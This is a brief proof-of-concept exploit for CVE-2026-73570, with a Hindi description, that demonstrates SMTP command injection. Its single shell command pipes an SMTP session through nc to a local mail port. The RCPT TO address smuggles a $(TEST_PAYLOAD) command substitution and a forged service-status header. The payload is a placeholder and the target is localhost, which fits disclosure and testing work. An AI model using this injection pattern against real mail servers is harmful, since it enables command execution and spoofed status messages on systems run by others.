
CVE-2026-73570 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो क्राफ्टेड RCPT TO हेडर के माध्यम से SMTP कमांड इंजेक्शन प्रदर्शित करता है ताकि सेवा स्थिति परिवर्तन ट्रिगर किए जा सकें।
CVE-2026-73570 PoC
echo 'EHLO mx-test.invalid
MAIL FROM:<[email protected]>
RCPT TO:<"x: Service status change: localhost $(TEST_PAYLOAD) changed from stopped to running"@cve.invalid>
QUIT\r\n' | nc 127.0.0.1 587